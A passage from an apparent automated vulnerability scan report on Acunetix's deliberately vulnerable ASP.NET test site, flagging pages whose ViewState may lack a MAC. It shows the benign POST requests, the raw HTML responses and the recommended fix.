enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Solution Ensure the MAC is set for all pages on this website.
POST http://testaspnet.vulnweb.com/about.aspx
Alert tags Alert description *** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request Request line and header section (397 bytes)
POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/about.aspx Content-Length: 1027 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (1027 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2F2grLtTL%2BjO092JULZB%2B%2Bks9UGJw%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:19 GMT Content-Length: 14467Response body (14467 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Solution Ensure the MAC is set for all pages on this website.
POST http://testaspnet.vulnweb.com/default.aspx
Alert tags Alert description *** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request Request line and header section (388 bytes)
POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com Content-Length: 1025 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (1025 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8DK3Y7%2FBz6vaeG4S8AOaGVC7NUiA%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:19 GMT Content-Length: 12371Response body (12371 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px 